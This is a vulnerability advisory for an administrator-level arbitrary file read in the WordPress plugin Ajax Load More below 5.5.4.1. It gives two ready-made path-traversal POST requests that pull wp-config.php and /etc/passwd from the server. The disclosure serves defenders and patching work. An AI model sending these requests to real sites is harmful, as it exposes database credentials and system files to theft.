Ajax Load More < 5.5.4.1 - Admin+ Arbitrary File Read

2022-08-2400:00:00

wpvulndb

375

arbitrary file read

php files

admin+

ajax load more

security exploit

post request

theme-repeater

file inclusion

0.001 Low

EPSS

Percentile

36.7%

JSON

The plugin does not properly validates paths generated with user input in the alm_repeaters_export() function, which could allow high privilege users to read arbitrary files form the server (even when they should not be able to have access to any, for example in multisite setup) This is due to an incomplete fix of CVE-2022-2943

Get arbitrary PHP files, such as wp-config.php

POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

alm_repeaters_export_type=a&alm_repeaters_export=1&alm_repeaters_export_name=../../../wp-config


Get arbitrary files (requires the alm_templates folder to exist inside the active theme, or a web server not needing intermediary folders to exist, such as IIS)

POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Connection: close
Cookie: [admin+]

alm_repeaters_export_type=theme-repeater&alm_repeaters_export=1&alm_repeaters_export_name=../../../../../../../etc/passwd

0.001 Low

EPSS

Percentile

36.7%

JSON

Related for WPEX-ID:3207BBEA-B4DC-4AE0-8A48-D7089BA7107F